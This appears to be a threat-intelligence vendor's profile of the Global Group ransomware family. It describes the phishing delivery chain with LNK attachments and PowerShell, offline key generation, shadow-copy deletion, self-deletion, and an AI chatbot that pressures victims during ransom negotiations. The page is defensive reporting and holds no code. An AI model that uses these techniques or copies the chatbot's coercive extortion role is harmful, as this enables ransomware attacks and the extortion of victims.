Global Group
Global Group is a ransomware family and ransomware-as-a-service (RaaS) operation that emerged in 2025 and is described in the provided reporting as a successor to the Mamona ransomware family; some reporting also suggests it may be linked to or a possible rebrand of BlackLock/Black Lock. It has been delivered in phishing campaigns associated with the Phorpiex botnet, including high-volume malspam using subjects such as "Your Document" and ZIP attachments containing double-extension Windows shortcut files such as "Document.doc.lnk." When executed, the LNK launches cmd.exe and PowerShell to download and run the ransomware payload, sometimes under names resembling legitimate Windows files such as "windrv.exe," using living-off-the-land techniques to reduce detection.
A notable capability is its offline or "mute" mode: Global Group generates encryption keys locally on the victim host and does not require command-and-control communication to begin encryption, making it viable in offline and air-gapped environments and reducing opportunities for network-based detection. The malware is reported to use ChaCha20-Poly1305 for encryption, append the ".Reco" extension to encrypted files, delete Volume Shadow Copies, terminate analysis and database-related processes to maximize encryption impact, delay briefly using a ping to 127.0.0.7, and then self-delete to reduce forensic artifacts. Reporting in the provided content also states that it changes the victim wallpaper to display a ransom note. One source explicitly notes that this strain conducts no data exfiltration and performs activity locally on the compromised system.
Operationally, Global Group is described as a RaaS operation with a Tor-based negotiation portal. Reporting states that victims are directed from the ransom note to this portal, where an AI chatbot interacts with victims, automates communications, and applies psychological pressure during negotiations. Reviewed chat transcripts reportedly showed demands reaching seven-figure sums, including 9.5 BTC in one case. The group has been mentioned alongside other 2025 ransomware brands and was reported claiming a breach of Albavisión involving alleged theft of 400GB of data. High-confidence infection-chain indicators and behaviors mentioned in the content include phishing emails with LNK attachments disguised as documents, use of cmd.exe and PowerShell, payload names such as windrv.exe, local key generation, ChaCha20-Poly1305 encryption, deletion of shadow copies, self-deletion after a ping-based delay, process termination, the ".Reco" file extension, and use of a Tor negotiation portal with an AI chatbot.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Ransomware delivered via phishing (ZIP + double-extension LNK) that can run offline, generates local ChaCha20-Poly1305 keys, deletes shadow copies, self-deletes, and kills analysis/database-related processes.
RaaS operation active since early June 2025 targeting multiple regions/sectors; uses AI-driven negotiation tooling (per summary).
Ransomware strain delivered via malspam campaigns attributed to Phorpiex botnet activity.
Ransomware featuring an offline-capable encryption mode ("mute" mode) that generates keys locally, uses ChaCha20-Poly1305 for encryption, attempts to delete volume shadow copies to hinder recovery, and self-deletes after a short delay to reduce forensic artifacts.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.